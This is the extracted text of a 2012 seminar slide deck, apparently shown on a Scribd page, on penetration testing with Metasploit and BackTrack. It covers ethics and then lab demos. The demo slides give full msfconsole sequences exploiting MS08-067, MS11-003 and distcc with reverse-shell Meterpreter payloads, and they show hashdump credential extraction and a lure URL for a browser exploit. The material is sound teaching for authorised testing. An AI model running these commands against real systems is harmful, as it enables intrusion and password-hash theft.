Scribd Logo
Carica

Benvenuto in Scribd!

  • Penetration Testing With Metasploit

    Caricato da

    fl3xu5
    598 visualizzazioni35 pagine
    Penetration Testing With Metasploit

    Copyright

    © Attribution Non-Commercial (BY-NC)

    Formati disponibili

    PDF, TXT o leggi online da Scribd

    Hai trovato utile questo documento?

    Questo contenuto è inappropriato?

    Segnala questo documento
    Penetration Testing With Metasploit

    Copyright:

    Attribution Non-Commercial (BY-NC)
    Scarica in formato PDF, TXT o leggi online su Scribd
    Segnala contenuti inappropriati
    598 visualizzazioni35 pagine

    Penetration Testing With Metasploit

    Caricato da

    fl3xu5
    Penetration Testing With Metasploit

    Copyright:

    Attribution Non-Commercial (BY-NC)
    Scarica in formato PDF, TXT o leggi online su Scribd
    Segnala contenuti inappropriati
    di 35

    penetration testing with metasploit

    Presented by Syarif 3xu5


    Seminar IT Security Safe The System Sumedang, April 29 2012 STMIK Sumedang

    Sunday, April 29, 12

    Agenda

    Why & Whats Penetration Testing ( Pentest ) << back|track Overview Metasploit Basic & Meterpreter DEMO :)

    Sunday, April 29, 12

    Why Do a Pentest
    Millions of dollars investment in security A Penetration Test is one of the most
    effective ways to identify systemic weaknesses and deciencies in these programs *1) program to protect critical infrastructures , prevent data breaches *1)

    Sunday, April 29, 12

    Whats Penetration Testing

    A method to evaluate the security of computer system / network Practice ( attacking ) an IT System like a hacker do

    Find a security holes ( systemic weaknesses ) By pass security mechanism compromise an Organizations IT System Security

    Must have a permission from IT System Owner !

    illegal activity put you in a Jail


    Sunday, April 29, 12

    Ethics
    Think before Act Dont be Stupid Dont be malicious

    Sunday, April 29, 12

    Pentest Phase
    Reporting Post Exploitation Exploitation Vulnerability Analysis Information Gathering

    Sunday, April 29, 12

    << back|track overview

    Lets Watching the Video :)

    Sunday, April 29, 12

    << back|track overview


    The Most Advanced Linux Security Distribution

    Real World Pentesting Tools

    . Developed for Security Professional


    Open Source & Always be

    Sunday, April 29, 12

    << back|track overview

    Sunday, April 29, 12

    << back|track overview

    Sunday, April 29, 12

    Whats
    Not just a tool, but an entire framework *1) an Open source platform for writing
    security tools and exploits *2) exploits, payloads, encoders,

    Easily build attack vectors to add its Create and execute more advanced attack Ruby based
    Sunday, April 29, 12

    Metasploit interfaces
    MSFconsole MSFcli msfweb, msfgui ( discontinued ) Metasploit Pro, Metasploit Express Armitage
    Sunday, April 29, 12

    MSFconsole

    Sunday, April 29, 12

    MSFcli

    Sunday, April 29, 12

    Metasploit Terminology

    Exploit : code that allow a pentester take some advantages of a aw within system,application, or service *1) Payload : code that we want the target system to execute ( few commands to be executed on the target system ) *1) Shellcode : a set of instructions used as payload when exploitation occurs *1) Module : a software that can be used by metasploit *1) Listener : a component for waiting an incoming connection *1)

    Sunday, April 29, 12

    How does exploitation works


    2 1
    exploit + payload exploit run , then payload run

    Upload / Download data

    attacker

    vulnerable server

    Sunday, April 29, 12

    Traditional Pentest Vs Metasploit


    Traditional Pentest
    Public Exploit Gathering Change offsets Replace ShellCode

    Metasploit for Pentest


    Load Metasploit Choose the target OS Use exploit SET Payload Execute

    Sunday, April 29, 12

    Meterpreter

    as a payload after vulnerability is exploited *1) Improve the post exploitation

    Sunday, April 29, 12

    Meterpreter
    Exploiting a vulnerability meterpreter shell Select a meterpreter as a payload

    Sunday, April 29, 12

    Meterpreter command

    Sunday, April 29, 12

    Meterpreter command

    Sunday, April 29, 12

    Meterpreter command

    Sunday, April 29, 12

    Meterpreter command

    Sunday, April 29, 12

    Meterpreter command

    Sunday, April 29, 12

    Pentest Scenario

    * attacker vulnerable OS on VMware


    * : Ubuntu 8.04 metasploitable

    Sunday, April 29, 12

    OS in the Lab

    BackTrack 5 R 2

    IP address : 172.16.240.143

    Windows Xp SP 2 IP address : 172.16.240.129

    Windows 2003 Server IP address : 172.16.240.141

    Windows 7 IP address : 172.16.240.142

    Ubuntu Linux 8.04 ( Metasploitable ) IP address : 172.16.240.144

    Sunday, April 29, 12

    Windows XP Exploitation

    msf > search windows/smb msf > info exploit/windows/smb/ms08_067_netapi msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > show payloads msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp msf exploit(ms08_067_netapi) > show options msf exploit(ms08_067_netapi) > set RHOST 172.16.240.129 msf exploit(ms08_067_netapi) > set LHOST 172.16.240.143 msf exploit(ms08_067_netapi) > show options msf exploit(ms08_067_netapi) > exploit meterpreter > background session -l

    Sunday, April 29, 12

    Windows XP Post Exploitation

    session -i 1 meterpreter > getsystem -h getuid hashdump

    Sunday, April 29, 12

    Windows 2003 Server Exploitation



    msf > search windows/smb msf > info exploit/windows/smb/ms08_067_netapi msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > show payloads msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp msf exploit(ms08_067_netapi) > show options msf exploit(ms08_067_netapi) > set RHOST 172.16.240.129 msf exploit(ms08_067_netapi) > set LHOST 172.16.240.143 msf exploit(ms08_067_netapi) > show options msf exploit(ms08_067_netapi) > exploit meterpreter > background session -l

    Sunday, April 29, 12

    Windows 7 Exploitation

    msf > use exploit/windows/browser/ms11_003_ie_css_import msf exploit(ms11_003_ie_css_import) > set PAYLOAD windows/meterpreter/reverse_tcp msf exploit(ms11_003_ie_css_import) > show options msf exploit(ms11_003_ie_css_import) > set SRVHOST 172.16.240.143 msf exploit(ms11_003_ie_css_import) > set SRVPORT 80 msf exploit(ms11_003_ie_css_import) > set URIPATH miyabi-naked.avi msf exploit(ms11_003_ie_css_import) > set LHOST 172.16.240.143 msf exploit(ms11_003_ie_css_import) > set LPORT 443 msf exploit(ms11_003_ie_css_import) > exploit

    Just wait until the victim open the url http://172.16.240.143:80/miyabi-naked.avi

    Sunday, April 29, 12

    Windows 7 Exploitation

    msf exploit(ms11_003_ie_css_import) > sessions -l msf exploit(ms11_003_ie_css_import) > sessions -i 1 meterpreter > sysinfo meterpreter > shell

    Sunday, April 29, 12

    Ubuntu 8.04 Metasploitable Exploitation


    Sunday, April 29, 12

    search distcc use exploit/unix/misc/distcc_exec show payloads set PAYLOAD cmd/unix/reverse show options set rhost 172.16.240.144 set lhost 172.16.240.143 exploit

    Any Question ?
    Contact me

    website : http://3x.us Ofcial BackTrack Indonesia Community :


    http://indobacktrack.or.id

    Email : 3xu5@indobacktrack.or.id twitter : @3xu5


    Sunday, April 29, 12

    Greet & Thanks To


    BackTrack Linux Metasploit Team ( HD Moore & rapid7 ) Offensive Security / Metasploit Unleashed David Kennedy Georgia Weidman
    Sunday, April 29, 12

    References

    Sunday, April 29, 12

    1. Metasploit The Penetration Testers Guide : David Kennedy , Jim OGorman, Devon Kearns, Mati Aharoni 2. http://www.metasploit.com 3. http://www.offensive-security.com/metasploitunleashed/Main_Page 4. http://www.pentest-standard.org/index.php/ PTES_Technical_Guidelines

    Potrebbero piacerti anche